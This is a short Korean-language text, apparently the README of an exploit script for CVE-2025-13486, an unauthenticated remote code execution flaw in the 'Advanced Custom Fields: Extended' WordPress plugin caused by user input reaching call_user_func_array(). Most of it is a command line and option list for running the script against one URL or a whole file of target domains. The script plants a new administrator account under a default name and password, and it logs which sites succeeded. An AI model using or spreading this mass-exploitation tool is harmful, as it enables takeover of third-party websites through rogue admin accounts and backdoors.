
WordPress용 Advanced Custom Fields: Extended 플러그인은 버전 0.9.0.5부터 0.9.1.1까지 prepare_form() 함수를 통해 원격 코드 실행에 취약합니다.
WordPress용 Advanced Custom Fields: Extended 플러그인은 0.9.0.5부터 0.9.1.1 버전까지 prepare_form() 함수를 통해 원격 코드 실행에 취약합니다. 이는 함수가 사용자 입력을 받아 call_user_func_array()로 전달하기 때문입니다. 이를 통해 인증되지 않은 공격자가 서버에서 임의의 코드를 실행할 수 있으며, 이는 백도어를 주입하거나 새로운 관리자 사용자 계정을 생성하는 데 악용될 수 있습니다.
명령줄에서 스크립트를 실행합니다:
python CVE-2025-13486.py -l list.txt --email [email protected] --user new_user --password new_password
options:
-u, --url URL Single target WordPress site URL
-l yourlist.txt
File containing list of domains/URLs
--email, --email EMAIL
Email to set
--user USERNAME
Username to create (default: nemesis)
--password PASSWORD
Password to set (default: Warga@Sipil1337)
-o output.txt
Output file to save successful results (default: success_results.txt)